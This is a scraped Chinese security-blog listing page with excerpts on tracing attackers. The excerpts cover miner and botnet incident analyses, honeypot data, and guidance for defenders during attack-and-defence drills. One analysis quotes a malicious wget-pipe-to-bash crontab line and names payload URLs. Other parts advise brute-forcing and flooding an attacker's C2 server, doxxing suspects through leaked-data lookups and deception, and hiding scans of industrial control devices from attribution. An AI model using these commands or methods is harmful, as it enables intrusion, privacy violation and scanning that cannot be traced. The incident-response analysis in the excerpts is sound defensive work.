安服笔记:蓝队溯源反制技术分享 安全闲碎

安服笔记:蓝队溯源反制技术分享

0x01 前言从今年开始,各个防守单位不满足于不失分的现状并且领导要求服务的乙方能够溯源到攻击者并得到分数,这无疑是增大了蓝队队员的工作量。因此决定输出一篇HW蓝队溯源反制技术文章,仅供大家参考。0x02 数据的来源一般来说,蓝队队员获取的数据不外乎有以下几种:1、蜜罐2、流量监测设备3、WAF、IPS、IDS4、钓鱼邮件0x03 数据分析思路在我们拿到数据之后需要对数据进行分析,针对不同的设备有不同的分析思路以及关注点。(一)WAF、流量监测设备1、请求数据包 -> 可能包含攻击反弹的C2地址或者DNSLOG地址2、某些可注册的网站,通过流量分析 -> 获取攻击者注册手机号,甚至身份证等信息3、IP地址 - > 分析攻击行为,过滤掉国外肉鸡攻击IP。4、重点关注来自阿里、腾讯等云服务器过来的攻击流量(二) 钓鱼邮件1、分析附件中样本外联的C2地址2、获取邮件发送方的IP地址 -> 显示邮件原文(三)巧借脚本帮助分析假如流量监测设备上告警数量较多,我们可以借助脚本帮助蓝队队员分析。脚本编写思路:1、调用监测设备接口获取互联网攻击IP2、调用威胁情报分析平台和FOFA结构对攻击IP进行分析 -> 获取域名解析记录、端口3、如果域名中包含”.cn”的域名,直接输出Whois反查的结果。重点关注信息在数据分析的过程中我们应该重点关注以下信息:1、IP地址2、DNSLOG C2地址3、钓鱼邮件中的信息4、蜜罐抓取到的Hacker ID0x04 溯源反制针对以上我们获取到的不同信息,有着不同的溯源思路。IP地址分析地理位置查询红队攻击者会借用手机热点发起攻击,我们可以通过地理位置查询到他所处的位置,如果和攻防演练的比赛场地接近,可以暂时不封该IP,并重点进行关注分析。300米误差 地址:https://chaipip.com/aiwen.html威胁情报分析拿到攻击IP后我们可以在威胁情报平台中进行搜索,获取如主机信息、近期活动情况、域名解析等信息。这个就不多讲了。主机信息那么主机信息我们要重点关注端口信息1、存在WEB应用端口 -> 反制2、CS TeamServer(50050) -> 爆破 脚本地址:https://github.com/LubyRuffy/csbruter-> DDOS搅屎:批量上线钓鱼马,启几百个进程,DDOS 红方的cs 端 脚本地址:https://github.com/Tk369/pluginS/blob/master/ll.py 注意:隔离环境中使用!!! 实际测试结果:双方DDOS emmmm域名解析记录重点关注.cn域名1、最近解析到该IP上的域名 存在 -> 继续分析 不存在,并且ping该域名的结果非攻击IP,则停止分析2、域名 = Hacker ID3、.cn的域名 直接获取域名注册信息 WHY?-> cnnic强制显示真实个人信息 地址:https://sg.godaddy.com/zh/whois/results.aspx?checkAvail=1&domain=QQ号码溯源思路拿到QQ号码之后重点应该是去社工库去查Q绑、地址等信息,其次就是在各大搜索引擎以及社交平台搜索其信息。1、社工库 -> 手机号、身份证(运气好)等信息2、搜索引擎 -> 推荐谷歌3、社交平台 -> 百度贴吧、微博等4、加好友,加好友聊天去套单位,伪装成学弟,可以去贴吧搜点学校照片发朋友圈,再加好友。HackerID溯源思路假如我们获取到了攻击者的HackerID,我们可以通过以下几种思路进行分析:1、搜索引擎2、各大SRC3、问xxx你认识吗?emmmm手机号码拿到手机号码,我们可以做的事情就更多了。可以通过社工库获取到QQ信息,微博地址;其次可以通过支付宝确认攻击者的姓名等等。1、支付宝转账 - > 确定姓名,甚至获取照片2、微信搜索 -> 微信ID可能是攻击者的ID,甚至照片3、社工库微博账号思路:微博Oid -> TG社工库反查手机号码(微博5e数据)百度账号思路:1、贴吧搜索2、根据头像在GOOGLE中搜索DNSLOG地址1、思路和上述一致,不再赘述2、搅屎:批量PING攻击机的DNSLOG地址,制造大量垃圾数据。3、注意: 地址为以下地址可停止分析:*.dnslog.cn 、*.burpcollaborator.net、*.bxss.me0x05 总结其实在溯源过程中最重要的是社工库,其次才是上述的溯源分析思路。蓝队的队员在HW防守的过程中,如果有蜜罐设备,尽量设置成高交互的,有意想不到的发现。初冬时节,落叶飘零,天气转凉,各位师傅们注意防寒保暖哦~更多干货等着我们在这个冬季一起解锁,欢迎关注~监制:船长、铁子   策划:格纸   文案:ahu   美工:青柠 原文始发于微信公众号(我是安服):安服笔记:蓝队溯源反制技术分享
阅读全文
防追踪溯源识别联网工控设备的方法 安全闲碎

防追踪溯源识别联网工控设备的方法

一、概述本文章结合作者在平时工作中真实经历,首先介绍了现有扫描联网工控设备技术存在的缺陷,基于现有技术提出了一种防追踪溯源扫描工控设备的解决方法,并在工控安全态势感知系统、工控应急风险评估和远程渗透实际场景中应用。其次在解决方案中给出了具体的实施步骤和过程,最后通过多种方案比较,选定在国外购买的VPS上,自己搭建一套稳定、可靠和高效的vpn代理服务应用,并进行了防追踪溯源技术的验证。二、现有技术缺陷伴随中国智能制造2025、两化融合以及工业互联网等背景下,越来越多的工业控制系统暴露在网络空间里,为了掌握互联网上有多少工控设备,以及这些工控设备的型号和存在的风险,市面上大多采用工控态势感知系统、nmap以及plcscan等工具对联网的工控设备进行不间断扫描探测。这些系统或工具的流量出口大多经过公司内部机房或者国内云服务器上,现有技术存在如下缺陷和问题。1)部署在公司内部机房,一旦触发扫描目标的入侵检测系统检测到发起扫描的源IP,则可以根据该IP进行反渗透或者反攻击,导致公司内部其它服务器遭受影响;2)部署在国内云服务器上,一旦扫描目标的检测系统检测到发起扫描的源IP,则可以根据购买云服务器备案的客户信息进行溯源,并追究导致安全事故的责任人;3)目前市面扫描探测联网工控设备(态势感知系统、nmap工具和plcscan等工具)均采用TCP或者UDP方式进行工控设备探测,扫描探测指纹未经过加密保护,容易被第三方截取并分析出采用的关键技术方法。4)目前主流的代理服务器如shadowsocks只能对http或https应用进行代理,不能对ICMP、Telnet、原生tcp、udp socket 服务进行代理传输,达到隐蔽扫描的效果;5)国内的VPN或者免费的VPN不稳定、已掉线,易被中国防火墙封锁。三、解决方案本文章提出了一种基于防追踪溯源技术识别联网工控设备的应用方法,解决了传统技术中出现的未对扫描服务器进行追踪溯源的保护、未对扫描探测技术方法进行保护等问题。此方法主要分为扫描代理客户端、代理服务器和扫描目标组成。方法实现主要包含以下步骤:步骤1:部署代理服务器,国外vultr官网购买一台VPS服务器,在部署上linux操作系统后,并部署OPENVPN代理服务器应用,并启动代理服务,监听代理客户端的请求。步骤2:本地部署扫描服务器(如态势感知系统、nmap工具和plcscan扫描工具等),并在扫描服务器上安装部署OPENVPN代理客户端,设置代理客户端的代理配置文件,主要是配置代理服务器的IP地址、端口、通信方式及证书等信息。步骤3:通过扫描服务器执行相关的工控扫描任务对联网工控设备进行扫描识别。所有的扫描行为均会通过VPN代理服务器转发到扫描目标设备。目标设备返回信息到VPN代理服务器,代理服务再将信息转发给扫描客户端,扫描客户端根据返回的报文与工控指纹库进行匹配,来进行工控资产识别。 基于防追踪溯源识别联网工控设备的业务模型如下图所示:扫描代理客户端:扫描客户端首先对代理服务器相关信息进行配置,主要配置代理服务的IP、端口及认证信息。并开始对目标IP设备进行扫描,此时由于配置了代理客户端,所有扫描请求数据不会直接发送到目标IP设备,而会通过VPN私有通道加密发送到VPN代理服务器上。代理服务器:代理服务器获取的扫描客户端的扫描,会将数据无缝转发给真实的目标IP设备。目标工控设备:目标工控设备收到来自VPN代理服务器扫描请求,会对VPN代理服务器进行响应,代理服务器会将此响应加密转发给原始扫描客户端。数据加解密过程:扫描客户端会对扫描数据进行加密并传输给VPN代理服务器,代理服务器也会对响应扫描客户端的数据进行加密,扫描客户端收到数据会进行解密。四、实施过程与验证方式实施过程:搭建openvpn环境1)购买服务器由于国内如阿里云购买服务器均要实名认证,国外购买服务器价格昂贵等特点,所以决定采用在vultr.com购买VPS服务器,服务稳定、价格低廉、服务器地理区域可任意切换,购买的VPS如下图所示:2)利用docker在VPS上快速搭建openvpn代理应用首先在linux上安装docker应用,安装成功后安装以下步骤进行openvpn代理服务器安装部署:打开terminal终端,配置环境变量,输入如下命令:export OVPN_DATA=openvpn_data2.创建一个数据卷存储配置文件和证书等文件,输入如下命令:docker volume create --name $OVPN_DATA3.初始化配置文件到数据卷中,输入如下命令:docker run -v $OVPN_DATA:/etc/openvpn --rm kylemanna/openvpn ovpn_genconfig -u udp://140.82.*.*140.82.*.* 需替换为购买vps虚拟服务主机IP地址4.初始化配置,并保存授权密码,输入如下命令:docker run -v $OVPN_DATA:/etc/openvpn --rm -it kylemanna/openvpn ovpn_initpki5.开启openvpn容器,输入如下命令: docker run -v $OVPN_DATA:/etc/openvpn -d -p 1194:1194/udp --cap-add=NET_ADMIN --name=openvpn kylemanna/openvpn6. 生成用户证书,如果需要生成多个用户证书可以执行多次该命令,输入如下命令:docker run -v $OVPN_DATA:/etc/openvpn --rm -it kylemanna/openvpn easyrsa build-client-full tencent nopass7. 将用户证书导出到本地文件,输入如下命令:docker run -v $OVPN_DATA:/etc/openvpn --rm kylemanna/openvpn ovpn_getclient tencent > tencent.ovpn远程登录代理服务器如下图所示:扫描服务器部署openvpn代理客户端1)linux Centos7部署使用,参照如下步骤:安装epel yum源,输入如下命令:2.安装openvpn,输入如下命令:yun install -y openvpn3.将代理服务器安装部署成功生成的tencent.ovpn文件按照如下方式进修改,tencent.ovpn文件内如下所示:并将tencent.ovpn文件,上传到/etc/openvpn/目录下,然后日志输出到/var/log/openvpn.log。4.在开机启动项/etc/rc.local 文件添加如下命令,并重启服务器openvpn --daemon --cd /etc/openvpn --config tencent.ovpn --log-append /var/log/openvpn.log扫描服务器代理客户端信息如下图所示:测试客户端IP:192.168.10.108客户端代理配置如下图所示:验证过程:防追踪溯源通过扫描服务器客户端代理对目标主机222.86.67.52和 114.221.127.188进行防追踪溯源技术验证。1.应用层telnet协议代理验证验证通过192.168.10.108(内网服务器) 通过代理服务器(vpn.server)进行telnet连接目标IP(114.221.127.188)地址的验证,如下图所示114.221.127.188机器抓包截图如下所示:发现是通过140.82.63.14进行的2.应用层telnet协议代理验证验证通过192.168.10.108(内网服务器) 通过代理服务器(vpn.server)进行telnet连接目标IP(222.86.57.52)地址的验证从上图可知,当客户端通过telent 目标 222.86.57.52 已经通过 [email protected]服务器进行了数据包的转发。3.ICMP协议代理验证通过192.168.10.108(内网服务器) 通过代理服务器(vpn.server)进行ping 8.8.8.8的验证,如下图所示:4.nmap扫描代理验证nmap扫描验证如下图所示:5.利用扫描软件对S7协议plc进行验证客户端对109.105.11.68进行S7协议plc探测验证如下图所示:五、总结采用OPENVPN私有隧道进行扫描数据加密传输,不仅可以防止扫描行为被第三方截取或分析,而且还可以隐藏真实设备的身份,防止真实设备被追踪溯源,防止真实设备被反渗透、反攻击的风险。OPENVPN部署简单便捷、传输稳定可靠、通过绑定域名,IP地址可以任意切换,可以对所有的网络通讯行进行代理转发。特别是对原生tcp或udp socket应用进行完全转发,解决诸如某些代理只能对http或https协议进行代理转发的问题。 本文始发于微信公众号(疯猫网络):防追踪溯源识别联网工控设备的方法
阅读全文
服务器被人搞后如何溯源 安全文章

服务器被人搞后如何溯源

今天一起看看一些简单的入侵溯源是怎么做的,帮助大家进一步了解这方面的内容,建立兴趣。一般来说,对于普通用户,溯源的目的更多的是清理已经植入服务器的各种病毒,找到入侵源头,也就是黑客是通过什么漏洞入侵服务器,而这次要讲的溯源经历就是一起服务器被入侵挖矿溯源的经历,正好贴合这次分享的内容。故事的开始是这样的...在某一个天和日丽的晚上,抱歉,晚上没有太阳。在某个夜黑风高的晚上,我准备把最近写的用来爬取美丽小姐姐照片的爬虫部署到服务器上,结果登录到服务器上的时候,发现操作有点卡,很明显的感觉到服务器的异常,而昨天还没有这样的情况,好在安全技能没白学,第一时间意识到服务器被入侵了,先看看服务器的进程情况,输入Top命令,再按大写的P,根据CPU利用率来看看进程:可以看到一个很明显的CPU利用率接近100%的进程,而看进程名也不是我们自己启动的进程,基本是一个可疑进程。进一步查看端口连接信息可以看到1758,也是对应的刚才看到的那个pscf的异常进程连接了一个158.69.133.20:3333。这个IP明显不是咱们自己的IP,到https://www.ipip.net/ip.html查询下地理位置:这是一个国外IP,一般来说我们自己是熟悉自己服务器情况,我自己服务器上没有连接国外IP的情况,基本确定这个进程是有问题的,进一步到威胁情报平台查询下这个IP的威胁情报信息https://x.threatbook.cn/ip/158.69.133.20:是一个矿池地址,加上CPU利用率接近100%的情况,咱们可以确定服务器被入侵并被植入了挖矿程序。那么刚才那个异常进程,其实就是一个挖矿进程。现在要做的是找到入侵漏洞和清理病毒,首先要找到文件位置,kill进程。根据进程pid 1758直接ls -lh /proc/1758查看该进程的具体信息:可以看到进程的exe指向的文件在/var/tmp目录下,然后我们先kill -9 1758杀死进程,避免进程占用CPU资源导致我们相关操作有点慢。进入/var/tmp目录可以看到相关的文件,Linux 系统可以直接 md5sum 文件 来提取文件的MD5值,然后到到https://www.virustotal.com/ 进行查询,可以看到相关结果,根据结果显示毋庸置疑的可以确定是挖矿程序:包含我们直接查看w.conf文件,也能看出这是一个挖矿配置文件。根据经验,这种挖矿程序一般都是通过一个bash脚本进行执行然后下载进行启动,可以通过查找日志和history看看是否有wget、curl等下载行为:或者查找系统syslog既然找到了脚本就方便多了,我们全局find了下这个脚本,没有找到,不过好在脚本还没失效,直接下载脚本分析行为,发现:1、除了/var/tmp目录下的文件,其他文件已自删除2、脚本中还修改了crontab任务所以对应的清理方式我们就直接删除/var/tmp目录下的恶意文件即可,同时根据脚本的分析和刚才syslog中可以看到,脚本的下载执行是通过crontab任务的,root账户,我们直接查看/var/spool/cron/crontabs/root文件:所以这里也要清理,把相关任务删除即可。同时根据cronab任务文件内容,我们看到redis字样,所以可以怀疑是由于Redis服务入侵,经过排查,Redis确实存在未授权访问问题。对应的修复Redis的配置问题,关闭外网访问,增加密码验证,就可以修复问题,最终就完成了这样一次溯源的过程。这样一个溯源过程是比较顺利,因为我们基本是可以通过前一个步骤、或者历史痕迹查猜测到黑客的相关操作,甚至可以获得他的执行脚本进行行为分析,就能进行对应的清理工作,所以整体过程是很顺利;但在实际的一些溯源过程中,黑客会删除日志,清理相关痕迹,相关的链接会失效,所以需要更多的手段去分析、获取更多信息,猜测黑客的入侵原因。本次的溯源过程其实是一个比较简单的溯源经历,这次分享主要目的就是让大家大概的了解一个溯源的大概简单过程是怎么样的,溯源中又是如果通过进程、端口等信息排查异常文件,再通过进程找到对应文件,通过日志找到痕迹,一层层的剥丝抽茧来找到入侵问题,最终清理掉相关的恶意文件,修复漏洞。主要能够让大家先建立一个概念和认知,更加具体和详实的应急响应和溯源,请关注后续的不定期更新~原文链接:https://bbs.pediy.com/thread-248993.htmEND 本文始发于微信公众号(网络侦查研究院):服务器被人搞后如何溯源
阅读全文
僵尸网络团伙溯源之利用蜜罐数据 安全新闻

僵尸网络团伙溯源之利用蜜罐数据

1前言我们对于互联网中未知的世界总是充满好奇,就像是小时候仰望星空的孩子,想要了解满天星斗的意义,在互联网世界 IP 就像是天上的星星,背后也对应着一个个的个体。在日常状态下,我们是无法感知到整个互联网世界的攻击活动。我们可以利用现代化蜜罐技术,通过互联网空间中部署的多个可以感知互联网空间行为的点,感知互联网中自动化攻击的事件;通过长时间的对攻击事件的记录,使得我们可以根据积累的数据梳理出有特定关联的 IP 攻击团伙,发现未出现过的漏洞,最新出现的自动化攻击的木马,使得整个互联网中的攻击行为变得可视化。蜜罐是互联网空间攻击行为的见证者,是网络安全世界的年轮,也是非常重要的威胁情报的提供者。2蜜罐能为我们提供什么样的威胁情报通过在互联网外网空间中部署蜜罐程序,我们能够捕获到攻击者使用的攻击 IP,访问的目标端口与服务,识别出攻击者请求的数据包,对应利用的漏洞以及漏洞利用包中的木马下载地址。通过对木马的分析,我们可以标识出对应的僵尸网络团伙。1. 攻击者ip情报;2. 攻击的目标端口;3. 攻击的目标服务;4. 利用的漏洞情报;5. 使用的木马下载地址情报;6. 木马连接的C2主控端情报。3蜜罐产生的价值最大化本篇的蜜罐是放置在公网,用来捕获攻击者的自动化攻击行为,为了尽可能多的捕获到攻击者的攻击数据,我们需要了解攻击者的攻击流程。在网络空间攻击者的流程:1. 判断目标端口是否开放;2. 判断目标服务是否是想要攻击的服务;3. 判断是不是有漏洞的版本或者直接进行攻击测试;4. 判断攻击成功,如果成功下一步增加木马下载相关操作的 payload 进行攻击。针对攻击者的攻击流程,蜜罐对应的措施:1. 捕获全端口扫描行为记录,给端口扫描释放端口开放的信号;2. 识别攻击者请求的协议,给予对应的协议数据响应;3. 如果是 HTTP 协议,则根据 url 来给予对应应用的 Web 响应,如果 url 不存在,则给予一个通用页面的数据响应。4蜜罐采集的数据应用使用蜜罐数据进行僵尸网络攻击活动追踪,首先我们通过公开的已知僵尸网络分析文章,根据文章中的关键信息利用蜜罐来进行数据分析,案例如下:Kinsing miner 是一个挖矿僵尸网络,主要利用 redis 空口令进行攻击,利用 redis 主从备份功能植入恶意 redis 插件 red2.so,然后下载挖矿远控木马kinsing 进行执行,执行成功后系统内部 sshkey 将木马传播到整个内部网络,同时会使用多种漏洞进行自动化传播该木马程序。默认早期版本木马在主机上释放文件:/tmp/kdevtmpfsi/var/lib/redis/kinsing2/var/lib/redis/kinsing/var/lock/linux.lock以下是蜜罐捕获到的 kinsing 僵尸网络利用数据包,以下数据表示攻击者使用95.214.11.231 的 IP 对目标端口 6379 的 redis 服务,进行了 redis 主从备份,会将 45.10.88.124 配置成主服务器,备份 red2.so 的可执行程序。| 95.214.11.231 |     6379 | SLAVEOF |             || 95.214.11.231 |     6379 | CONFIG  |   || 95.214.11.231 |     6379 | SLAVEOF |                           | 最早发现攻击时间为2019年12月14日,攻击者最早使用的 IP 为45.10.88.103 ,早期可以下载木马 45.10.88.103/kinsing,说明该 IP 大概率是攻击者的 IP,而不是失陷 IP:我们将每一个有...
阅读全文
一次针对挖矿攻击溯源概述 安全文章

一次针对挖矿攻击溯源概述

排查某天多台机器cpu100%,疑似中了挖矿程序,在检测过程当中发现,外连了tcp        0      0 xxx.xxx.xxx:56208       94.23.41.130:80         ESTABLISHED 48630/systemd --use还有连接至37.59.43.131但是查看进程却又发现/tmp/systemd该文件被删除了。后来在yarn用户上发现被写入定时任务33 * * * * wget -qO- -U- hxxps://ddgsdk6oou6znsdn.tor2web.io/i.sh|bash || wget -qO- -U- hxxps://ddgsdk6oou6znsdn.onion.guide/i.sh|bash……每小时的第33分钟会执行一次还有在日志上发现有大量的操作记录网上搜索有关yarn近期漏洞,发现攻击者疑似利用了“Hadoop Yarn REST API 未授权漏洞”进行入侵。与腾讯云鼎实验室提供的攻击流程图很像随后为避免在内网机器上再次触发,到自己机器上执行了下命令发现该脚本会先把xmr、miner等kill掉,之后会检测/tmp/.X11-lock,建立文件由于取消操作较快没有让他及时删除该文件,它还会判断一层你的内核版本是多少,之后下载对应内核版本的二进制文件。文件存储/tmp/下,ls -la查看该隐藏文件分析该二进制文件(后续结果丢失)之后排查机器小于5kb的jar文件,发现Application.jar、SimpleApp.jar的文件1、Application.jar下述是SimpleApp.jar解包查看将base64解码后得到初步判断它会对spark集群机器分发该SimpleApp.jar文件,去执行这条命令。后续发现hxxp://176.119.28.11/b/z/ 目录存在大量被攻击机器ip点击查看其中某台机器的信息通过spark任务下载Application.jar,同时发现含有攻击者操作等脚本发现执行y.sh会把它写入tmp.txt文件之后再利用curl post到re.php当中,随即删除该文件。样本:https://malwr3chij47327q.onion.plus/SimpleApp.jarhttps://httpsxztdjm2vrpw.onion.plus/SimpleApp.jarhttp://176.119.28.11/y.sh 本文始发于微信公众号(逢人斗智斗勇):一次针对挖矿攻击溯源概述
阅读全文
Gafgyt 变种:Sakura 僵尸网络溯源分析报告 安全新闻

Gafgyt 变种:Sakura 僵尸网络溯源分析报告

1前言近年来,随着匿名货币的增长,僵尸网络攻击越来越频繁,各种二次开发的变种也越来越多。搭建1个开源的僵尸网络的成本很低,通过 Youtube 搜索可以找到大量“傻瓜”式搭建教程,甚至有申请匿名服务器的教程,可谓是“一条龙”服务。2事件起因近日,微步在线终端威胁检测与响应平台 OneEDR (以下简称OneEDR)监测发现,5月14日,某后台主机告警页面出现有7条可疑告警信息,凭借多年安全分析经验,初步判定为僵尸网络攻击。3告警排查分析3.1 告警详情分析点击时间最早的一条告警项查看详细日志信息,在父进程信息 sshd:[email protected] (无界面登录)中发现为可疑爆破登录,然后通过命令行工具发现执行切换目录、下载木马、执行和删除文件等可疑命令。继续查看这台主机的其他告警信息,第二条告警信息显示文件路径异常,可以看到进程路径已经 deleted , OneEDR 将其判定为“可能为攻击者巩固阵地的手段”。3.2 攻击原因排查通过登录服务器进行排查,发现该用户下无其他应用服务,继而查看ssh登录日志,发现了密码爆破的历史进程,确定攻击者是通过弱密码爆破登录服务器。然后使用 $lastb 命令根据时间排查日志,疑似13:49分最接近入侵时间,其余的时间都相差较大。3.3 上机排查使用 $ps -ef 命令查看所有进程时,发现进程 x86-Sakura 和进程 x32-Sakura 在14:00启动。使用 $ls -l /proc/32737 命令查看进程号32737确认木马存放的位置。使用 $ls /tmp |grep Sakura*  命令查看 /tmp 目录下列示的所有 Sakura 文件后,可以确认该恶意行为是针对多个平台(mips、mpsl、sh4、x86、arm6、x32、arm7、ppc、i586、m68k、ppc、arm4、arm5)的僵尸网络。通过分析 Sakura.sh ,得出 shell 会使用“||”符号来分隔 cd directory 命令。即使 /tmp 目录不存在,系统会提示 “No such file or directory” ,也会继续执行第二个 cd directory 命令。这样既能满足在不常用目录存储恶意样本不被发现的需求,又能在当不常用的目录不存在时使得恶意样本能正常保存下来。4样本分析X86.Sakura(6d21dd452c0ce920825bca8a5910c249),以此为例进行分析。先从 main 函数开始,它首先是要读取受害机的本地时间,通过 getsockname 和  /proc/net/route 命令获取受害机的公网ip、内网ip、网段、网关以及MAC地址等信息(以 t00000000t分割)。木马会确认有没有 python、python3、perl 以及 telnet 程序环境,如果有其中一个的话就会返回“22”,如果没有就返回 “Unknown Port”。初始化链接C2,并睡眠5秒,根据获取到的 ip+port+架构信息发送给C2确认受害机的相关信息。从网络数据可知,受害机向C2服务器(143.110.226.196:12345)发送ip port 架构的信息,C2服务器会回复 “PING” 确认在线。发送完相关信息后就一直等待C2发送指令,以便进行下一步行动。经过分析得出,有 tcp、udp、vse、stdhex、std、nfodrop、ovhkill、xmas、crush、stomp、stop 这11个命令;其中 atcp 是构造发送 tcp 攻击, audp 是构造发送 udp 攻击, vse 是攻击游戏服务器的相关 payload ,所有的攻击指令都是以这3种类型的攻击方式为基础去发送相关的数据。举例分析, Vseattack 可攻击运行 Valve Source Engine 的游戏服务器(使用 Steam 引擎制造商 Valve 软件协议(A2S_INFO数据包)在客户端和游戏服务器之间进行例行通信的一部分)。1)TCP,在指定的时间间隔内将 TCP 数据段发送到指定的主机/端口组合。2)UDP,将一些有效载荷发送到目标主机,指定端口、攻击持续时间和效载荷的最大内存。3)astd,定义了要发送的数据(其实是一个特殊字符串,然后i > 50就发送,i置0后累加又再次发送)。攻击时,...
阅读全文
反诈APP笔录?远程固定?溯源?鉴定? 安全闲碎

反诈APP笔录?远程固定?溯源?鉴定?

作为公安机关的最基层派出所是县(区)公安机关派驻各乡镇、街道(办事处)的单位肩负着打击、防范、管理、控制、服务等诸多职能电信网络诈骗已成为发展最快的刑事犯罪反诈任务繁重基层民警工作量陡增无论是日常上门反诈宣传接警时有关证据材料登记制作接受证据材料清单及报案人签名接案后或发现的犯罪线索迅速进行审查工作内容繁而杂警力有限,每环需要逐一完成处理速度慢,人员工作还辛苦!如何一站式解决上述问题?推荐你使用这个免费工具(仅限公安民警)掌上勘验仅需报案人安装掌上勘验扫码受理民警专属二维码无需担心报案人因个人顾虑包括案值小、嫌麻烦等情况不想到达到现场报案受理民警可提供专属ID完成远程报案完成上述流程受理民警即可获取电子证据提取固定清单电子证据现场提取笔录APP溯源分析报告提取电子数据压缩包上述流程仅需报案人自助完成受理民警即可获取上图材料工作效率大大提升省时又省力!还有还有......使用掌上勘验,可以针对涉诈样本金斗云APP溯源模块进行串并案分析挖掘同类型的团伙犯罪,将其一网打尽!方便了基层民警上级分管单位同样重要使用掌上勘验及对应后台可以对案件进行集中管理更好的服务于上级交办任务绩效考核等日常工作,一目了然!为了民众更放心我们还支持掌上勘验官方化更换定制单位名称/更换单位图标如:“XX市公安局电诈勘验助手”“XX市公安局报案助手”这些都可以,且一样免费!最后,划重点!!!掌上勘验可通过金斗云在线平台获取使用!且永久免费!(包括众多实用工具:APP溯源、IP刺探、IP定位等)第一步:谷歌或火狐浏览器访问http://10.146.99.71(GA网)▼第二步:需提供相关材料,完成注册。▼第三步:通过钉钉扫描下方二维码添加客服获取账号密码。▼本期编辑:HNE如有侵权,请联系管理员删除有更多内容在“情报学院”知识星球👇 本文始发于微信公众号(情报分析师):反诈APP笔录?远程固定?溯源?鉴定?
阅读全文
记一次“本以为简简单单但发现有一丁点复杂”的安全分析事件 安全文章

记一次“本以为简简单单但发现有一丁点复杂”的安全分析事件

在我们使用态势感知等安全设备从事安全分析工作时间较长后总会产生思维惯性,从而会忘记了如何人工进行安全分析。有时给到客户的建议却解决不了实际问题,所以如何结合人工分析并掌握从而达成一次较为高效并且能解决实际问题的技能就显得尤为重要。情况简介2021年某日某时,正吃完午饭的我,揉着眼睛打开态势感知平台准备日常划水,突然一个告警引起了我的注意,于是我“啪”的一下,很快啊,赶紧把相关告警进行溯源排查,一个小时后就生成了一份像模像样的安全分析告警溯源报告,立即联系相关单位做下发,同样的在我正慢慢悠悠吃晚饭的时候,突然被拉进了一个微信群,主机管理员告诉我病毒查杀不出来需要我的协助,我就纳闷了,杀个毒有那么难吗?还得我亲自出马,后来我才发现事情没有我想象的那么简单……安全分析1. 2021年某月某日下午,态势感知平台告警情况如下,某单位主机疑似感染LifeCalendarWorm挖矿蠕虫2. 进行溯源分析发现源IP:10.x.x.x每隔10分钟连接一次恶意域名,恶意域名已在微步威胁情报库进行查询威胁有效,以下为举个“栗子”:3. 分析完毕基本确认该主机感染挖矿病毒,迅速出具安全事件溯源报告,下发给对应单位做处置操作安全建议如下:人工分析当我在下发完分析报告后高枕无忧的吃晚饭的时候,此时突然“啪”的一下,很快奥,我没有闪,被拉到了一个微信群,里面负责该主机的工程师说病毒查杀不出来。我:杀的出来。他:杀不出来。我:杀的出来。他:杀不出来。我:你换个杀毒软件,企业版的用起来他:换了三个了我:.……此时,我心中一万匹草泥马飞奔而过,你这是在质疑我这练习时长两年半的老师傅,我现在就实地给你表演一个,“鸡你太….”不,上机杀毒从入门到精通1. 排查cpu及内存运行情况,cpu及内存运行正常,未发现进程大量占用cpu运行:2. 内存使用情况正常3. netstat -ano查看本机对外连接情况,未发现连接恶意ip情况:4. 排查用户情况在win+r中输入msc发现该机器为域控制器5. 使用net user排查用户情况,发现多个用户,该机器为域控制器,属于正常现象6. 排查计划任务情况,跟管理员进行确认未发现异常计划任务7. 在任务管理器网络连接进行查看发现dns.exe进程中存在态势感知平台报送IP初步分析结论:并非该主机感染病毒木马,该主机疑似为域控服务器包含dns服务,存在其他域内子主机通过该主机进行dns解析,所以造成了态势感知平台告警源ip为该主机,实际情况为域内子主机感染病毒。追查受害者大意了啊,告警平台他欺负我这22岁老同志,原来由于探针部署位置在核心交换机,导致未追踪到真实受害者机器,没事,反正排查出来就让他们去给下面的机器做杀毒吧,但这时客户又要求追查出真实中毒机器,哎呀,难道我的闪用完了吗,顿时恶向胆边生,手里不由点开了word打上了五个大字,辞职申请书。但一想到那还在远方等着我发工资带她吃饭嗷嗷待哺的女朋友,不由的退缩了,“打工人,打工魂,打工人都是人上人,干就完了。奥利给”!!!1.抓包神器wireshark:要想分析网络会话肯定得使用wireshark在该主机进行安装,此时,出乎意料的事情发生了,winpcap安装到一半机器卡住了,完全不能动了,这是业务主机啊,旁边工程师看到了。旁边工程师:“说哎呀G工啊,准备下岗吧”我:“……”2. 联系主机管理员进行重启,还好没啥事3. 下载便携版wireshark,根据病毒外连域名时间规律进行抓包,抓到真实受害主机4. 告知主机管理员受害者IP进行杀毒,事件解决!!!总结这年分析工作太依赖于安全设备告警,忽略了老手艺,之后多上机处置,把wireshark再玩的6一些,此次处置过程中发现了很多新亮点,新技能。还好有万能的百度,之后多做一些人工分析工作,找找感觉,还有业务机器如果是虚拟机最好让管理员在我们上手前做快照,物理主机则让他们安装相应的软件,切莫自行上手!精彩推荐 本文始发于微信公众号(FreeBuf):记一次“本以为简简单单但发现有一丁点复杂”的安全分析事件
阅读全文
浅谈入侵溯源过程中的一些常见姿势 安全文章

浅谈入侵溯源过程中的一些常见姿势

本文来源:乌云安全 si1ence0x0 背景攻击溯源作为安全事故中事后响应的重要组成部分,通过对受害资产与内网流量进行分析一定程度上还原攻击者的攻击路径与攻击手法,有助于修复漏洞与风险避免二次事件的发生。攻击知识可转换成防御优势,如果能够做到积极主动且有预见性,就能更好地控制后果。说人话:被黑了就要知道为什么被黑了怎么被黑的,不能这么不明不白。0x1 主体思路溯源的过程当中的时候除开相关的技术手段之外,首先还是需要确认一个整体的思路。对异常点进行一个整体的分析并根据实际环境给出几种可能的方案,这样处理起问题相对就可以游刃有余心里有谱,手上就不慌了。常规出现的、容易被用户感知的异常点举例如下:1.网页被篡改、被挂上了黑链、web文件丢失等2.数据库被篡改、web系统运行异常影响可用性、web用户密码被篡改等3.主机出现运行异常反应卡顿、文件被加密、主机系统出现其他用户等4.主机流量层出现大量异常流量根据用户现场的情况往往还需要做一些信息收集的工作比如,出现异常的时间点(非常重要)、异常服务器的主要业务情况、大致的一个网络拓扑是不是在DMZ区、是否可以公网访问、开放了那些端口、是否有打补丁、使用了怎么样的一个web技术、最近是否做过什么变更、有没有什么安全设备之类的。根据收集到的信息,往往可以得出了几种可能。一个web服务器公网可以访问出现了被挂黑链的事件使用了s2框架,那么初步可以怀疑是s2-045 s2-046之类的命令执行漏洞了;如果一台公网服务器没有安装补丁又没有防火墙防护,administrator的密码为[email protected]那么有很大的可能性是被暴力破解成功;后面的工作主要就是收集各种资料证明这一猜想即可。0x2 